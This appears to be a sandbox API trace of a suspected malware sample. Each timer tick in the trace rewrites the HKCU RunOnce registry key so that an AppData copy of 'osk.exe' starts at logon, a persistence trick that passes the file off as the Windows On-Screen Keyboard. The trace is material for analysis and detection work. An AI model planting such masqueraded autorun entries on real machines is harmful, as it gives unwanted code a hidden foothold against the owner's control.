[0104.075] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.089] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.089] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.089] KillTimer (hWnd=0x20280, uIDEvent=0x23ed) returned 1 [0104.089] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.090] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.090] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.090] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.090] RegCloseKey (hKey=0x280) returned 0x0 [0104.090] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.090] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.090] SetTimer (hWnd=0x20280, nIDEvent=0x23ee, uElapse=0xa, lpTimerFunc=0x0) returned 0x23ee [0104.090] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.104] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.104] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.105] KillTimer (hWnd=0x20280, uIDEvent=0x23ee) returned 1 [0104.105] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.105] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.105] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: 
phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.105] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.106] RegCloseKey (hKey=0x280) returned 0x0 [0104.106] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.106] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.106] SetTimer (hWnd=0x20280, nIDEvent=0x23ef, uElapse=0xa, lpTimerFunc=0x0) returned 0x23ef [0104.106] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.120] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.120] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.120] KillTimer (hWnd=0x20280, uIDEvent=0x23ef) returned 1 [0104.120] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.121] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.121] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.121] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.121] RegCloseKey (hKey=0x280) returned 0x0 [0104.121] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.121] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.121] SetTimer (hWnd=0x20280, nIDEvent=0x23f0, uElapse=0xa, lpTimerFunc=0x0) returned 0x23f0 [0104.122] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 
lpMsg=0x33f7fc) returned 1 [0104.135] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.135] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.136] KillTimer (hWnd=0x20280, uIDEvent=0x23f0) returned 1 [0104.136] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.136] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.136] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.137] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.137] RegCloseKey (hKey=0x280) returned 0x0 [0104.137] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.137] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.137] SetTimer (hWnd=0x20280, nIDEvent=0x23f1, uElapse=0xa, lpTimerFunc=0x0) returned 0x23f1 [0104.137] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.151] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.151] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.151] KillTimer (hWnd=0x20280, uIDEvent=0x23f1) returned 1 [0104.152] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.152] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.152] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.152] RegSetValueExA (in: 
hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.152] RegCloseKey (hKey=0x280) returned 0x0 [0104.152] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.153] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.153] SetTimer (hWnd=0x20280, nIDEvent=0x23f2, uElapse=0xa, lpTimerFunc=0x0) returned 0x23f2 [0104.153] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.167] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.167] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.167] KillTimer (hWnd=0x20280, uIDEvent=0x23f2) returned 1 [0104.167] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.167] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.168] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.168] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.168] RegCloseKey (hKey=0x280) returned 0x0 [0104.168] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.168] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.168] SetTimer (hWnd=0x20280, nIDEvent=0x23f3, uElapse=0xa, lpTimerFunc=0x0) returned 0x23f3 [0104.168] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.182] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.182] 
DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.182] KillTimer (hWnd=0x20280, uIDEvent=0x23f3) returned 1 [0104.183] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.183] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.183] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.183] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.184] RegCloseKey (hKey=0x280) returned 0x0 [0104.184] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.184] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.184] SetTimer (hWnd=0x20280, nIDEvent=0x23f4, uElapse=0xa, lpTimerFunc=0x0) returned 0x23f4 [0104.184] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.198] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.198] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.198] KillTimer (hWnd=0x20280, uIDEvent=0x23f4) returned 1 [0104.199] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.199] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.199] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.199] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.199] RegCloseKey (hKey=0x280) returned 0x0 [0104.200] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.200] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.200] SetTimer (hWnd=0x20280, nIDEvent=0x23f5, uElapse=0xa, lpTimerFunc=0x0) returned 0x23f5 [0104.200] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.213] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.214] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.214] KillTimer (hWnd=0x20280, uIDEvent=0x23f5) returned 1 [0104.214] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.214] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.214] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.215] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.215] RegCloseKey (hKey=0x280) returned 0x0 [0104.215] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.215] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.215] SetTimer (hWnd=0x20280, nIDEvent=0x23f6, uElapse=0xa, lpTimerFunc=0x0) returned 0x23f6 [0104.215] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.243] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.243] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.244] KillTimer (hWnd=0x20280, 
uIDEvent=0x23f6) returned 1 [0104.244] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.244] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.245] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.245] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.245] RegCloseKey (hKey=0x280) returned 0x0 [0104.245] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.245] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.245] SetTimer (hWnd=0x20280, nIDEvent=0x23f7, uElapse=0xa, lpTimerFunc=0x0) returned 0x23f7 [0104.246] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.261] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.261] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.261] KillTimer (hWnd=0x20280, uIDEvent=0x23f7) returned 1 [0104.261] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.262] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.262] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.262] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.262] RegCloseKey (hKey=0x280) returned 0x0 [0104.262] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.262] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.262] SetTimer (hWnd=0x20280, nIDEvent=0x23f8, uElapse=0xa, lpTimerFunc=0x0) returned 0x23f8 [0104.262] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.276] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.276] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.276] KillTimer (hWnd=0x20280, uIDEvent=0x23f8) returned 1 [0104.276] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.277] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.277] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.277] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.277] RegCloseKey (hKey=0x280) returned 0x0 [0104.277] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.277] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.278] SetTimer (hWnd=0x20280, nIDEvent=0x23f9, uElapse=0xa, lpTimerFunc=0x0) returned 0x23f9 [0104.278] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.291] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.291] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.292] KillTimer (hWnd=0x20280, uIDEvent=0x23f9) returned 1 [0104.292] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0104.292] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.292] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.293] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.293] RegCloseKey (hKey=0x280) returned 0x0 [0104.293] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.293] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.293] SetTimer (hWnd=0x20280, nIDEvent=0x23fa, uElapse=0xa, lpTimerFunc=0x0) returned 0x23fa [0104.293] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.307] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.307] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.307] KillTimer (hWnd=0x20280, uIDEvent=0x23fa) returned 1 [0104.308] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.308] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.308] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.308] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.308] RegCloseKey (hKey=0x280) returned 0x0 
[0104.308] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.309] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.309] SetTimer (hWnd=0x20280, nIDEvent=0x23fb, uElapse=0xa, lpTimerFunc=0x0) returned 0x23fb [0104.309] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.323] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.323] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.323] KillTimer (hWnd=0x20280, uIDEvent=0x23fb) returned 1 [0104.323] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.323] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.323] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.323] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.324] RegCloseKey (hKey=0x280) returned 0x0 [0104.324] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.324] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.324] SetTimer (hWnd=0x20280, nIDEvent=0x23fc, uElapse=0xa, lpTimerFunc=0x0) returned 0x23fc [0104.324] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.818] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.818] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.818] KillTimer (hWnd=0x20280, uIDEvent=0x23fc) returned 1 [0104.818] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.819] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.819] 
RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.820] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.820] RegCloseKey (hKey=0x280) returned 0x0 [0104.820] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.820] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.820] SetTimer (hWnd=0x20280, nIDEvent=0x23fd, uElapse=0xa, lpTimerFunc=0x0) returned 0x23fd [0104.820] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.822] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.822] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.823] KillTimer (hWnd=0x20280, uIDEvent=0x23fd) returned 1 [0104.823] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.823] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.823] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.824] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.824] RegCloseKey (hKey=0x280) returned 0x0 [0104.824] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.824] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.824] SetTimer (hWnd=0x20280, nIDEvent=0x23fe, uElapse=0xa, lpTimerFunc=0x0) returned 0x23fe [0104.824] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.837] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.837] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.838] KillTimer (hWnd=0x20280, uIDEvent=0x23fe) returned 1 [0104.838] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.838] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.838] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.839] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.839] RegCloseKey (hKey=0x280) returned 0x0 [0104.839] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.839] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.839] SetTimer (hWnd=0x20280, nIDEvent=0x23ff, uElapse=0xa, lpTimerFunc=0x0) returned 0x23ff [0104.839] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.853] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.853] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.853] KillTimer (hWnd=0x20280, uIDEvent=0x23ff) returned 1 [0104.854] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.854] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.854] RegCreateKeyExA (in: hKey=0x80000001, 
